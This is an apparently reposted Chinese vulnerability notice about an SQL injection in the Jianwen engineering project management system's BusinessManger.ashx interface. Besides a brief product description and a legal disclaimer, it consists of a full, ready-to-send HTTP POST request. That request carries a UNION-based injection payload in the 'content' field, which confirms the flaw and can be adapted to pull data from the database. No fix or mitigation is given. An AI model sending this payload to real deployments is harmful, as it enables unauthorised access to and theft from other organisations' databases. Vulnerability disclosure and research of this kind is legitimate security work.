建文工程管理系统businessMangere.ashx处存在SQL注入漏洞

admin 2024年8月3日15:20:19评论58 views字数 549阅读1分49秒阅读模式

1. 漏洞描述

    建文工程项目管理软件是一套适用于各类弱电施工、系统集成、机房工程、IDC数据中心项目、智能化系统、安防工程、智能交通(ITS)、照明工程、节能环保、照明工程、电子警察、PCL/DCSGONG工业自动化控制等的集成系统。

建文工程管理系统businessMangere.ashx处存在SQL注入漏洞

2. 漏洞复现

POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 125
method=PrjType&content=%' and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32));-- a

建文工程管理系统businessMangere.ashx处存在SQL注入漏洞

 

原文始发于微信公众号(蟹堡安全团队):建文工程管理系统businessMangere.ashx处存在SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月3日15:20:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   建文工程管理系统businessMangere.ashx处存在SQL注入漏洞https://cn-sec.com/archives/3028786.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息